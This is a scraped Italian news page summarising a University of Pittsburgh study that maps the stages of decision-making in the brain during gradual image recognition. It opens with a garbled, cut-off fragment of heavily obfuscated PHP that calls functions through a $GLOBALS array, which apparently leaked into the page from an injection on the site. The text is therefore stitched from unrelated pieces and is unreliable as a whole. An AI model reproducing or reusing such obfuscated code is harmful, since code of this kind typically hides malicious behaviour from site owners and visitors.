=round(0+3))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][60]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.5+0.5)];if($GLOBALS['_1188104000_'][73]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.2+0.2+0.2+0.2+0.2)];if($GLOBALS['_1188104000_'][89]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][106]($_59) I cento passi della decisione

Area Riservata



Ti ricordiamo che per rendere attivo il tuo account dopo la registrazione, sarà necessario aprire il messaggio email che riceverai e cliccare sul link di attivazione.
I cento passi della decisione PDF 

Fonte: Lescienze.it

 

Uno studio condotto da ricercatori dell'Università di Pittsburgh, è riuscito - grazie a un'innovativa tecnica di analisi - a identificare i passi in cui un processo decisionale viene scomposto nel cervello umano.

Lo studio è il primo che riesce a separare nell'essere umano le aree attive mentre si sta prendendo una decisione - aree che il direttore della ricerca Mark Wheeler chiama "aree di valutazione" - distinguendole da quelle associate con la comunicazione e il pensiero che vengono tradizionalmente considerate le aree decisionali.

Secondo Wheeler, in questo modo si può distinguere una vera e propria gerarchia di passi decisionali.

Wheeler e colleghi hanno tracciato l'attività cerebrale di un gruppo di soggetti mentre questi cercavano di riconoscere una serie di immagini che venivano presentate loro. Le immagini erano dapprima indistingubili per poi manifestarsi gradualmente. Come ci si aspettava, l'attività dei centri della visione aumentava via via che l'immagine diventava più chiara e più informazione arrivava al cervello.

Tuttavia i dati hanno rivelato un'attività stabilmente aumentata anche nelle aree deputate all'elaborazione degli oggetti, del ragionamento e della memoria, indicando che queste regioni valutano l'immagine in un contesto di memorie ed esperienze passate via via che divengono disponibili nuove informazioni.

Peraltro, le aree che già si sapevano essere attive nel momento in cui si prende una decisione, non mostravano un'attività rilevante fino al momento in cui la persona non identificava l'immagine, suggerendo che esse svolgano un compito di ricontrollo una volta che siano state accumulate tutte le informazioni.

Il risultato, coerente con procedenti studi condotti su primati non umani, è il primo che riesce a mappare il processo di raccolta dele informazioni e decisionale nei momenti che precedono il momento definitivo di riconoscimento.

 

Per migliorare la tua navigazione su questo sito, utilizziamo cookies ed altre tecnologie che ci permettono di riconoscerti. Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy.

Acconsento all'utilizzo dei cookies su questo sito